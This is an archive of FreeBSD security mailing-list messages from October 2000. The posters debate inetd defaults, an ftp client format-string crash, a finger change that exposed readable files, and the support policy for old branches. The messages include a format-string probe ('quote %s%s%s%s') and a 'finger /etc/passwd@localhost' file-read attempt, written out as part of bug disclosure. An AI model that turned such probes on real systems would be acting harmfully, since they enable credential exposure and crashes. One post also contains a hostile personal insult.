Commercial Unix vendors like Sun, on the other hand, only need to be upgraded every few years thanks to their extensive patch support. Backwards compatibility is often maintained across several major revisions saving hundreds of hours of maintenance in some cases. We're still using some Sun binaries compiled 10 and 11 years ago! Think of how many times you've had to recompile FreeBSD binaries in just the last couple of years. The 3.3 ftpd is barely months old much less years. Takes a lot of the "free" out of FreeBSD.

See http://sunsolve.Sun.COM/pub-cgi/show.pl?target=patches/patch-access for Solaris' list of supported releases going back to 2.3 (1994).

--
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Mon Oct 2 19:54: 0 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 330B037B503; Mon, 2 Oct 2000 19:53:58 -0700 (PDT)
Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA08215; Mon, 2 Oct 2000 19:53:58 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Date: Mon, 2 Oct 2000 19:53:58 -0700
From: Kris Kennaway
To: Brett Glass
Cc: Jordan Hubbard , Alfred Perlstein , security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf
Message-ID: <20001002195357.B40584@freefall.freebsd.org>
References: <20001002172133.B27736@fw.wintelcom.net> <78689.970533567@winston.osd.bsdi.com> <4.3.2.7.2.20001002185439.044cff00@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <4.3.2.7.2.20001002185439.044cff00@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 06:59:08PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Oct 02, 2000 at 06:59:08PM -0600, Brett Glass wrote:
> My personal preference would be to lose telnet and ftp too (or
> at least offer this as an option) and enable sshd (which gives
> you ssh and scp instead). Since I realise that not everyone

sshd is already enabled out of the box, by default.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Mon Oct 2 20:15:42 2000
Delivered-To: freebsd-security@freebsd.org
Received: from bignet.ru (ns.bignet.ru [213.242.28.5]) by hub.freebsd.org (Postfix) with SMTP id B12B637B502 for ; Mon, 2 Oct 2000 20:15:37 -0700 (PDT)
Received: (qmail 4622 invoked from network); 3 Oct 2000 03:09:58 -0000
Received: from morpheus.bignet.ru (HELO 213.242.29.34) (213.242.29.34) by ns.bignet.ru with SMTP; 3 Oct 2000 03:09:58 -0000
Date: Tue, 3 Oct 2000 07:17:23 +0400
From: Blackman
X-Mailer: The Bat! (v1.44)
Reply-To: Blackman
X-Priority: 3 (Normal)
Message-ID: <12556850256.20001003071723@bignet.ru>
To: freebsd-security@FreeBSD.ORG
Subject: Kernel trap after showmount -a within a jail
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi!

Subj% Have a real system, NFS on it and jail. Kernel trap after 'showmount -a' started from unprivileged user... How to resolve this problem?... Thanks.

P.S> One more problem: how to prevent the 'df' command from users,
P.S> that allow them to see "real" things on the system?
---
Best regards,
Blackman mailto:blackman@bignet.ru
Security Officer
---"I'm peace man"---

From owner-freebsd-security Mon Oct 2 21:26:59 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 5813B37B502; Mon, 2 Oct 2000 21:26:55 -0700 (PDT)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id WAA16322; Mon, 2 Oct 2000 22:26:51 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id WAA21046; Mon, 2 Oct 2000 22:26:50 -0600 (MDT) (envelope-from nate)
Date: Mon, 2 Oct 2000 22:26:50 -0600 (MDT)
Message-Id: <200010030426.WAA21046@nomad.yogotech.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Jordan Hubbard
Cc: Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf
In-Reply-To: <78689.970533567@winston.osd.bsdi.com>
References: <20001002172133.B27736@fw.wintelcom.net> <78689.970533567@winston.osd.bsdi.com>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Can we please lose everything but telnet and ftp? This getting
>
> That wouldn't bother me at all.

I think the 'internal' auth should be on as well, since sendmail (for silly reasons) likes it on, and the internal version is silly enough to keep sendmail happy.

Nate

From owner-freebsd-security Mon Oct 2 21:36:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id F114437B503 for ; Mon, 2 Oct 2000 21:36:11 -0700 (PDT)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id WAA16491; Mon, 2 Oct 2000 22:36:11 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id WAA21079; Mon, 2 Oct 2000 22:36:10 -0600 (MDT) (envelope-from nate)
Date: Mon, 2 Oct 2000 22:36:10 -0600 (MDT)
Message-Id: <200010030436.WAA21079@nomad.yogotech.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Roger Marquis
Cc: security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
In-Reply-To:
References:
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Operating Systems like FreeBSD, lacking much in the way of backwards
> compatibility, must be babied through frequent upgrades with lots of
> skilled systems administration.

Huh? I've got FreeBSD 1.1 binaries running on boxes that are 6-7 years old. I don't understand the issues about 'lacking backwards compatibility'. Just recently my 5 year old uemacs binary failed on freefall because they (finally) deleted the shared libraries it used. I could make it work by bringing in the libraries, but it was *easier* just to upgrade to a newer binary.

> Commercial Unix vendors like Sun, on the other hand, only need to be
> upgraded every few years thanks to their extensive patch support.
*Yeah*

Suffice it to say I disagree, since Sun boxes used on the Internet *must* be upgraded to the latest/greatest version of SunOS if you intend on being truly secure. And, you end up having to roll your own versions of the software, because too often the software on them is so out-dated and buggy that it's easier to do it yourself than rely on Sun.

> Backwards compatibility is often maintained across several major
> revisions saving hundreds of hours of maintenance in some cases.

See above.

> We're still using some Sun binaries compiled 10 and 11 years ago!

If FreeBSD were that old, I could say the same thing. Give me a couple of years. :)

> Think of how many times you've had to recompile FreeBSD binaries in
> just the last couple of years.

If you're recompiling the binaries because you *had* to, then you're misinformed. You get to recompile them, but you certainly don't have to.

Nate

From owner-freebsd-security Mon Oct 2 22:22: 7 2000
Delivered-To: freebsd-security@freebsd.org
Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 998E337B502 for ; Mon, 2 Oct 2000 22:22:00 -0700 (PDT)
Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id MAA26084; Tue, 3 Oct 2000 12:20:21 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru)
Date: Tue, 3 Oct 2000 12:20:20 +0700 (NSS)
From: Max Khon
To: Neil Blakey-Milner
Cc: Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG
Subject: Re: ftpd bug in FreeBSD through at least 3.4
In-Reply-To: <20001002204526.A58098@mithrandr.moria.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

hi, there!

On Mon, 2 Oct 2000, Neil Blakey-Milner wrote:

> > >The system's ftp daemon or wu-ftpd? The ftp daemons installed with 3.5.1
> > >and 4.1[.1] don't seem affected.
> >
> > It DEFINITELY works on FreeBSD's own ftpd in 3.4-RELEASE and all 2.x versions
> > I have tested.
>
> This is quite cute:
>
> (nbm@futon) /home/nbm> ftp 127.0.0.1
> Connected to 127.0.0.1.
> 220 futon.sunesi.com FTP server (Version 6.00) ready.
> Name (127.0.0.1:nbm): ftp
> 331 Guest login ok, send your email address as password.
> Password:
> 230 Guest login ok, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> quote %s%s%s%s
> Segmentation fault
>
> As in, it crashes the ftp client.
>
> A 4.0 ftp client connecting to 'futon' (a 3.3 machine):
>
> (nbm@couch) /home/nbm> ftp futon
> Connected to futon.sunesi.com.
> 220 futon.sunesi.com FTP server (Version 6.00) ready.
> Name (futon.sunesi.com:nbm): ftp
> 331 Guest login ok, send your email address as password.
> Password:
> 230 Guest login ok, access restrictions apply.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> quot %s%s%s%s
> 500 '%S%S%S%S': command not understood.
>
> A 3.4 ftp client to 'futon' also segfaults. The ftp server doesn't
> segfault in the cases I've tried.
this was fixed in HEAD, RELENG_4 and RELENG_3 on Jun 23 2000 (cmds.c 1.17, 1.16.2.1 and 1.14.2.3)

/fjoe

From owner-freebsd-security Mon Oct 2 23:52:39 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id CA15637B502 for ; Mon, 2 Oct 2000 23:52:35 -0700 (PDT)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13gLvS-0005fj-00; Tue, 03 Oct 2000 08:51:42 +0200
Date: Tue, 3 Oct 2000 08:51:42 +0200 (IST)
From: Roman Shterenzon
To: Nate Williams
Cc: security@FreeBSD.ORG
Subject: Re: cvs commit: src/etc inetd.conf
In-Reply-To: <200010030426.WAA21046@nomad.yogotech.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 2 Oct 2000, Nate Williams wrote:

> > > Can we please lose everything but telnet and ftp? This getting
> >
> > That wouldn't bother me at all.
>
> I think the 'internal' auth should be on as well, since sendmail (for
> silly reasons) likes it on, and the internal version is silly enough to
> keep sendmail happy.

If we do that, maybe we should better change UNKNOWN to UNIX in order to keep irc servers happy.

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Tue Oct 3 0: 3: 6 2000
Delivered-To: freebsd-security@freebsd.org
Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 52A3237B502 for ; Tue, 3 Oct 2000 00:03:02 -0700 (PDT)
Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gMFp-000PLt-00; Tue, 03 Oct 2000 01:12:45 -0600
Message-ID: <39D986ED.901B2A2F@softweyr.com>
Date: Tue, 03 Oct 2000 01:12:45 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: sysinstall DOESN'T ASK, dangerous defaults!
References: <39CB4C42.1A59669C@kew.com> <4.3.2.7.2.20000923222349.04919900@localhost> <4.3.2.7.2.20000927214450.04c02ec0@localhost> <4.3.2.7.2.20000929223558.04900df0@localhost>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Brett Glass wrote:
>
> At 01:14 AM 9/29/2000, Wes Peters wrote:
>
> >No, Brett, it is you who have been consistently demanding that FreeBSD break
> >the standard installation for everyone just to save you some work you're
> >supposedly paid to do.
>
> Wes, it's not very nice of you -- to say the least -- to misrepresent
> what I have said and recommended. It doesn't reflect well on you, and
> causes you to come off as a flamer rather than someone who can engage
> in a productive discussion.

Have you not been asking for a standard FreeBSD installation in which FTP and Telnet will not work? Yes or no will suffice.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Tue Oct 3 0:30:59 2000
Delivered-To: freebsd-security@freebsd.org
Received: from unicorn.blackhats.org (unicorn.blackhats.org [194.109.83.155]) by hub.freebsd.org (Postfix) with ESMTP id 7C4FB37B502; Tue, 3 Oct 2000 00:30:46 -0700 (PDT)
Received: by unicorn.blackhats.org (Postfix, from userid 1002) id 7918E12C18; Tue, 3 Oct 2000 09:30:03 +0200 (CEST)
Date: Tue, 3 Oct 2000 09:30:03 +0200
From: The Unicorn
To: Joseph Scott
Cc: Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001003093003.F89835@unicorn.blackhats.org>
References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <39D92E08.E00CF2E4@owp.csus.edu>; from joseph.scott@owp.csus.edu on Mon, Oct 02, 2000 at 05:53:28PM -0700
X-Files: The Truth Is Out There!
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 02 Oct 2000, Joseph Scott supposedly wrote:
>
> Brian Somers wrote:
> >
> > brian 2000/10/02 15:27:34 PDT
> >
> > Modified files:
> > usr.bin/finger finger.c
> > Log:
> > Don't allow finger /somefile, only allow filename expansions from
> > inside /etc/finger.conf
>
> This is one of those things that makes me go ack! So I started
> trying on a couple of my machines here. I tried it first against my
> own notebook running 4.1. It worked just as expected when run up
> against /etc/passwd@localhost. It did not work against a 3.4 machine
> from notebook though. I haven't looked too much closer at that part,
> but it seems to point to this "feature" being added somewhere between
> Jan 27 and Sep 14 (about the last world builds for these two
> machines).

I found the following:

[root @ me]:.../home/unicorn(2435)# finger /etc/passwd@localhost
[localhost]
finger: /etc/passwd: no such user
[root @ me]:.../home/unicorn(2436)# uname -a
FreeBSD me.xxx.org 4.0-STABLE FreeBSD 4.0-STABLE #0: Fri Jun 2 02:42:57 CEST 2000 root@me.xxx.org:/usr/src/sys/compile/ME i386

> Another thing I've noticed, it looks like it only works against world
> readable files. So some couldn't do a finger
> /etc/master.passwd@goodguysrus.com and expect something back. There
> are of course plenty of world readable files on a system that I
> wouldn't really want everyone and their fish to look at :-(
>
> I'm not a fan of finger in general, turning off inetd entirely is
> part of a normal install for me.
>
> --
> Joseph Scott
> joseph.scott@owp.csus.edu
> The Office Of Water Programs - CSU Sacramento
--- End of Quoted Text ---

Ciao,

Unicorn.

--
======= _ __,;;;/ TimeWaster ================================================
,;( )_, )~\| A Truly Wise Man Never Plays PGP: 64 07 5D 4C 3F 81 22 73
;; // `--; Leapfrog With A Unicorn... 52 9D 87 08 51 AA 35 F0
==='= ;\ = | ==== Youth is Not a Time in Life, It is a State of Mind!
======= Echelon Teasers: NSA CIA FBI Mossad BVD MI5 Cocaine Cuba Revolution Espionage To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 0:31:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.originative.co.uk (mailgate.originative.co.uk [194.217.50.228]) by hub.freebsd.org (Postfix) with ESMTP id 8B11F37B502; Tue, 3 Oct 2000 00:31:35 -0700 (PDT) Received: from originative.co.uk (lobster.originative.co.uk [194.217.50.241]) by mailgate.originative.co.uk (Postfix) with ESMTP id 103C21D149; Tue, 3 Oct 2000 08:31:34 +0100 (BST) Message-ID: <39D98B55.126DAFC4@originative.co.uk> Date: Tue, 03 Oct 2000 08:31:33 +0100 From: Paul Richards X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Mon, Oct 02, 2000 at 05:53:28PM -0700, Joseph Scott wrote: > > > but it seems to point to this "feature" being added somewhere between > > Jan 27 and Sep 14 (about the last world builds for these two > > machines). > > It was added just before 4.1.1, and since finger runs as user nobody It's about as good as an example as there can be as to why things should be left to mature in -current for a decent length of time before being moved over to what is supposed to be a stable branch. Code may look like it's working after a few days or a few weeks but it really needs to *mature* before it can be claimed to be stable. 
I think we push too many enhancements from current to stable, when we should really only push bug fixes onto the stable branch. The tendency to add enhancements carries the risk of actually creating new bugs in stable which is obviously not what we want to have happen. Paul Richards FreeBSD Services Ltd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 0:31:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id CD67D37B502 for ; Tue, 3 Oct 2000 00:31:49 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13gMhN-000PMT-00; Tue, 03 Oct 2000 01:41:13 -0600 Message-ID: <39D98D98.B0627C08@softweyr.com> Date: Tue, 03 Oct 2000 01:41:12 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Warner Losh Cc: Jordan Hubbard , security@FreeBSD.ORG Subject: Re: Security and FreeBSD, my overall perspective References: <2376.970339459@winston.osd.bsdi.com> <200009302258.QAA13969@harmony.village.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > > : (b) Add a new field to the ports infrastructure which indicates > : level of "trust" the project/security people have in that > : port. E.g. instead of having one big knob rather off-puttingly > : labelled 'FORBIDDEN', have a 'TRUST' or 'SECURITY_LEVEL' variable > : which goes from 1 to 10. Then the ports infrastructure can, if > : it wishes to, issue warnings of varying severity based on the > : trust level. > > 1 to 10 is too many levels. 
> But I'm not sure what the right number
> is, so let's assume it is N and move on.

N == 3 { 'green', 'yellow', 'red' }. If you're feeling like a telco, throw 'blue' in there somewhere, though nobody really seems to understand what 'blue' really means.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Tue Oct 3 0:39:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 11ED637B66C for ; Tue, 3 Oct 2000 00:39:21 -0700 (PDT) Received: (qmail 32333 invoked by uid 1000); 3 Oct 2000 07:40:30 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Oct 2000 07:40:30 -0000 Date: Tue, 3 Oct 2000 02:40:30 -0500 (CDT) From: Mike Silbersack To: Nate Williams Cc: Jordan Hubbard , Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <200010030426.WAA21046@nomad.yogotech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 2 Oct 2000, Nate Williams wrote:
> > > Can we please lose everything but telnet and ftp? This getting
> >
> > That wouldn't bother me at all.
>
> I think the 'internal' auth should be on as well, since sendmail (for
> silly reasons) likes it on, and the internal version is silly enough to
> keep sendmail happy.
>
>
> Nate

Isn't sendmail just as happy getting a RST back when it tries to connect? Auth seems to fall under the too much info category for a default install.
Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:16:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 4703C37B502 for ; Tue, 3 Oct 2000 01:16:54 -0700 (PDT) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id IAA05958; Tue, 3 Oct 2000 08:16:24 GMT Message-ID: <39D995D8.14DD0721@algroup.co.uk> Date: Tue, 03 Oct 2000 09:16:24 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.72 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Matt Dillon Cc: Garance A Drosihn , freebsd-security@FreeBSD.ORG Subject: Re: Proposed minor mod to openssh for interactive operation References: <200009300023.e8U0NUW20137@earth.backplane.com> <200010030000.e9300o311655@earth.backplane.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Dillon wrote: > > :> two programs interactively. > :> That is, send command, wait response, send command, wait > :> response. Delaying packets is a bad idea and cuts > :> performance over the link by about 20%. > : > :Would it be more appropriate to use stunnel (in ports) instead > :of an ssh connection for your application? > : > :(I'm just wondering...) > :--- > :Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu > > No, ssh provides the authentication mechanism as well as the > secure link trivially. Besides, both rsh and ssh were designed > for two-way operation so presumably they should actually do it > in a reasonably optimal manner when two-way operation is requested. stunnel can do authentication just as trivially... 
http://www.stunnel.org/faq/certs.html#ToC10 cheers, Adam -- Adam Laurie Tel: +44 (20) 8742 0755 A.L. Digital Ltd. Fax: +44 (20) 8742 5995 Voysey House http://www.thebunker.net Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:34:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from www14.gmx.net (www.gmx.net [194.221.183.54]) by hub.freebsd.org (Postfix) with SMTP id 8418137B502 for ; Tue, 3 Oct 2000 01:34:35 -0700 (PDT) Received: (qmail 848 invoked by uid 0); 3 Oct 2000 08:34:34 -0000 Date: Tue, 3 Oct 2000 10:34:34 +0200 (MEST) From: fastsniff@gmx.net To: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Subject: X-Priority: 3 (Normal) X-Authenticated-Sender: #0000255503@gmx.net X-Authenticated-IP: [134.102.7.202] Message-ID: <724.970562074@www14.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth 72daabf7 unsubscribe freebsd-security fastsniff@gmx.net -- Sent through GMX FreeMail - http://www.gmx.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:38:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 1902E37B502; Tue, 3 Oct 2000 01:38:21 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1088) id 6F2662B206; Tue, 3 Oct 2000 03:38:15 -0500 (CDT) Date: Tue, 3 Oct 2000 03:38:15 -0500 From: Dave McKay To: Brett Glass Cc: Kris Kennaway , Alex Charalabidis , "Chris D . 
Faulhaber" , security@FreeBSD.org Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001003033815.A27544@elvis.mu.org> References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> <20001002143917.B22329@freefall.freebsd.org> <4.3.2.7.2.20001002173916.046c16f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <4.3.2.7.2.20001002173916.046c16f0@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 05:43:10PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Brett,

This bug was a non-issue from the start, why did you have to drag your results on to the list? Wasn't it apparent after Warner said that they no longer support older releases of FreeBSD due to resource shortness that the thread was pointless?

My second rant is, have you ever noticed WHENEVER you write into the list it's ALWAYS the longest current thread running within a VERY short time? Do you think this is because of your genius in the BSD OS field? Or perhaps it's due to your keen wits being always about you when you write in. Please, and I mean this, DIE.

Brett Glass (brett@lariat.org) wrote:
> At 03:39 PM 10/2/2000, Kris Kennaway wrote:
>
> >No, I think your client is expanding the %s locally and sending the
> >junk to the server.
>
> Kris:
>
> I think you may be right here! The client may also be expanding the
> %s on the way BACK from the server. If this is the case, it is
> more serious because it means that a malicious server might be
> able to take over the client.
>
> I am checking to see if there are holes in the server, too. So
> far, when I send the same strings to the server using good ol'
> Telnet the server seems to respond pretty much correctly.
There > are still some minor server glitches: Some error messages are sent > twice instead of once, the command is always changed to all uppercase > up to the first whitespace and then echoed back with this modification, > and trailing whitespace at the ends of commands is not ignored. But > while these things could use fixing, none of them are exploitable. > > --Brett > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Dave McKay Network Engineer - Google Inc. dave@mu.org - dave@google.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 1:47:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.ninth-circle.org (lucifer.bart.nl [194.158.168.74]) by hub.freebsd.org (Postfix) with ESMTP id 06D1A37B66C; Tue, 3 Oct 2000 01:47:25 -0700 (PDT) Received: (from asmodai@localhost) by lucifer.ninth-circle.org (8.11.0/8.11.0) id e938hGT84923; Tue, 3 Oct 2000 10:43:16 +0200 (CEST) (envelope-from asmodai) Date: Tue, 3 Oct 2000 10:43:16 +0200 From: Jeroen Ruigrok van der Werven To: Warner Losh Cc: Robert Watson , Nate Williams , Poul-Henning Kamp , James Wyatt , Brett Glass , "Chris D . 
Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: <20001003104316.A84649@lucifer.bart.nl> References: <200010022331.RAA15790@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010022331.RAA15790@harmony.village.org>; from imp@village.org on Mon, Oct 02, 2000 at 05:31:42PM -0600 Organisation: VIA Net.Works The Netherlands Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-On [20001003 01:35], Warner Losh (imp@village.org) wrote:
>In message Robert Watson writes:
>: I think it is too early to write off 3-STABLE as there is a huge install
>: base for the branch, and many products based on it. We don't even have a
>: native Netscape build for 4-STABLE yet :-). I think it is fine to assert
>: that no new feature development is occurring there, however.
>
>According to the security officer's long-standing policy, we don't
>commit to support the old stale branch after we've had two releases on
>the new stable branch. This doesn't mean that we prevent people from
>contributing to it, just that we don't have resources to do so.

It is in my own interest to get these fixes in. People are always free to ask me to put specific pieces of code in the 3-STABLE tree in a `blessed by a freebsd.org committer' way.

Keep in mind I only do support work here, make sure some code gets MFC'd which will mean 3.x will be deployable for people in the near future.

--
Jeroen Ruigrok van der Werven Network- and systemadministrator VIA Net.Works The Netherlands BSD: Technical excellence at its best http://www.via-net-works.nl Grant me the serenity to accept the things I cannot change, courage to change the things I can, and wisdom to know the difference...
